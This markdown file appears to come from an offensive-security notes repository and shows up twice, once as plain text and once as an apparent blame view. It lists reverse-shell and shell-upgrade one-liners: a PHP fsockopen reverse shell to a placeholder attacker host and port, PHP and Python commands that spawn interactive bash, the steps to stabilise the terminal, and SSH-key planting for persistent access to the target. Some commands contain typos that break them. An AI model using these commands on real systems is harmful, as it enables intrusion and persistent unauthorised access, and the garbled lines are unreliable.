killchain-compendium/reverse_shells/docs/shell_collection.md

# Upgrade Reverse Shell 

## Via interpreter
### PHP
* reverse shell
```php
php -r '$sock=fsockopen("<attacker-IP>", <attacker-Port>);exec("/bin/sh -i <&3 >&3 2>&3");'
```
```php
php -r 'exec ("/bin/bash")";' 
```
* Sometimes even
```php
php -e 'exec "/bin/bash";'
```

### Python 
```python
python -c 'import pty; pty.spawn("/bin/bash")'
```

## Next
1. `ctrl` + `z`
2. `stty echo -raw`
3. `fg`
4. `export TERM=xterm`

## Via SSH
* `ssh-keygen`
* copy priv key and `chmod 600`
* `cat id_rsa.pub > authorized_keys` on target
fuff et al 2021-08-27 00:26:26 +02:00			`# Upgrade Reverse Shell`

			`## Via interpreter`
			`### PHP`
			`* reverse shell`
			```php
			`php -r '$sock=fsockopen("<attacker-IP>", <attacker-Port>);exec("/bin/sh -i <&3 >&3 2>&3");'`
			```
			```php
			`php -r 'exec ("/bin/bash")";'`
			```
			`* Sometimes even`
			```php
			`php -e 'exec "/bin/bash";'`
			```

			`### Python`
			```python
			`python -c 'import pty; pty.spawn("/bin/bash")'`
			```

			`## Next`
			1. `ctrl` + `z`
			2. `stty echo -raw`
			3. `fg`
			4. `export TERM=xterm`

			`## Via SSH`
			* `ssh-keygen`
			* copy priv key and `chmod 600`
			* `cat id_rsa.pub > authorized_keys` on target